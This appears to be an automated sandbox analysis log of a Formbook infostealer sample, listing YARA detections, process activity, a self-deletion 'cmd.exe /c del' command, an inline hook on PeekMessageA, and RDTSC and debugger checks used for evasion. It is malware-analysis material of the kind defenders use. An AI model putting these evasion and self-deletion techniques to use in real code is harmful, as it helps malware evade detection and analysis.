          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305D466
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC2581
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F90D20
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D86E91 appears 84 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D86EA6 appears 36 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D86FC1 appears 40 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D89100 appears 64 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 014FB150 appears 35 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D870FC appears 370 times
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: String function: 00D8BF63 appears 38 times
          Source: C:\Windows\SysWOW64\cmd.exeCode function: String function: 02F9B150 appears 45 times
          Source: RRW9901200241.exe, 00000000.00000002.341417567.0000000000FF0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemsvfw32.dll.muij% vs RRW9901200241.exe
          Source: RRW9901200241.exe, 00000000.00000003.337793378.000000001B18F000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RRW9901200241.exe
          Source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs RRW9901200241.exe
          Source: RRW9901200241.exe, 00000002.00000002.384345094.00000000015EF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs RRW9901200241.exe
          Source: RRW9901200241.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.RRW9901200241.exe.1a00000.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.RRW9901200241.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@6/4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AC5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002CA0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6536:120:WilError_01
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: Kernel32.dll
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: User32.dll
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: User32.dll
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: IEUCIZEO
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: Kernel32.dll
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: User32.dll
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: User32.dll
          Source: C:\Users\user\Desktop\RRW9901200241.exeCommand line argument: IEUCIZEO
          Source: RRW9901200241.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RRW9901200241.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: RRW9901200241.exeReversingLabs: Detection: 34%
          Source: C:\Users\user\Desktop\RRW9901200241.exeFile read: C:\Users\user\Desktop\RRW9901200241.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\RRW9901200241.exe 'C:\Users\user\Desktop\RRW9901200241.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\RRW9901200241.exe 'C:\Users\user\Desktop\RRW9901200241.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RRW9901200241.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RRW9901200241.exeProcess created: C:\Users\user\Desktop\RRW9901200241.exe 'C:\Users\user\Desktop\RRW9901200241.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RRW9901200241.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
          Source: RRW9901200241.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000003.00000000.363251700.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RRW9901200241.exe, 00000000.00000003.337251978.000000001B070000.00000004.00000001.sdmp, RRW9901200241.exe, 00000002.00000002.384345094.00000000015EF000.00000040.00000001.sdmp, cmd.exe, 00000004.00000002.678905716.000000000308F000.00000040.00000001.sdmp
          Source: Binary string: cmd.pdbUGP source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp, cmd.exe, 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RRW9901200241.exe, cmd.exe
          Source: Binary string: cmd.pdb source: RRW9901200241.exe, 00000002.00000003.381525500.0000000001081000.00000004.00000001.sdmp, cmd.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000003.00000000.363251700.0000000007CA0000.00000002.00000001.sdmp
          Source: RRW9901200241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: RRW9901200241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: RRW9901200241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: RRW9901200241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: RRW9901200241.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D91AB3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D89145 push ecx; ret
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FFC06 pushad ; retf
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041E3CF push ds; ret
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00417CE0 push 403FCDEBh; iretd
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00417CB6 push 403FCDEBh; iretd
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041CEF2 push eax; ret
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041CEFB push eax; ret
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041CEA5 push eax; ret
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0041CF5C push eax; ret
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00414F86 push edi; ret
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D89145 push ecx; ret
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0154D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B76BD push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B76D1 push ecx; ret
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FED0D1 push ecx; ret

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE5
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\RRW9901200241.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RRW9901200241.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000027D98E4 second address: 00000000027D98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmd.exeRDTSC instruction interceptor: First address: 00000000027D9B4E second address: 00000000027D9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00409A80 rdtsc
          Source: C:\Windows\explorer.exe TID: 1040Thread sleep count: 49 > 30
          Source: C:\Windows\explorer.exe TID: 1040Thread sleep time: -98000s >= -30000s
          Source: C:\Windows\SysWOW64\cmd.exe TID: 4868Thread sleep time: -100000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B245C FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B68BA FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002AB89C GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A85EA memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002C31DC FindFirstFileW,FindNextFileW,FindClose,
          Source: explorer.exe, 00000003.00000000.364943349.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000003.00000000.364891332.00000000083E8000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000003.00000000.368126601.0000000008662000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.690932206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000003.00000000.357665667.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.364891332.00000000083E8000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000003.00000000.357665667.00000000062E0000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000002.691817008.00000000062E0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
          Source: explorer.exe, 00000003.00000000.364593921.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000003.00000002.690932206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000003.00000002.690932206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000003.00000000.364593921.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.364943349.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000003.00000002.690932206.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000003.00000000.346593091.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\RRW9901200241.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\RRW9901200241.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmd.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00409A80 rdtsc
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0040ACC0 LdrLoadDll,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D889BC _memset,IsDebuggerPresent,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D91AB3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D91AB3 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D869A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FED06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FF575 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FF5B2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FF75D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_012FF615 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D869A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014F9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01514120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01514120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01514120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01514120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01514120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_014FB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015841E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01522990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0151C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015751BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015769A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015261A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01510050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01510050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015B2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01577016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01577016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_01577016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_015C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0150B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_0152002D mov eax, dword ptr fs:[00000030h]
